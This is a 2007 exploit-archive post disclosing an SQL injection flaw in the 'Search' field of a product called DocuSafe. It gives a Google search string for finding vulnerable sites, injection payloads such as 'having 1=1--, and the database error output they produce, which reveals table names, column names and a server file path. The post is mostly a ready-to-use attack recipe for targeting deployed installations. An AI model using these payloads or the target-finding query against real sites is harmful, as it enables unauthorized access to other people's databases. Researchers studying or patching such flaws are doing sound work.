Home / exploitsPDF  

docusafe-sql.txt

Posted on 15 November 2007

DocuSafe "Search" SQL Injection Aria-Security Team, http://Aria-Security.net ------------------------------- Shout Outs: AurA, imm02tal Vendor: http://gartha.net Google Search: intitle:Corporate Contact System insert your command in the section "search" example: 'having 1=1-- Result: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr) Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'. or 'group by tblMain.fldArtNr having 1=1-- result: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr) Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'. /includes/common.asp, line 62 Regards, The-0utl4w Credits Goes To Aria-Security.Net

 

TOP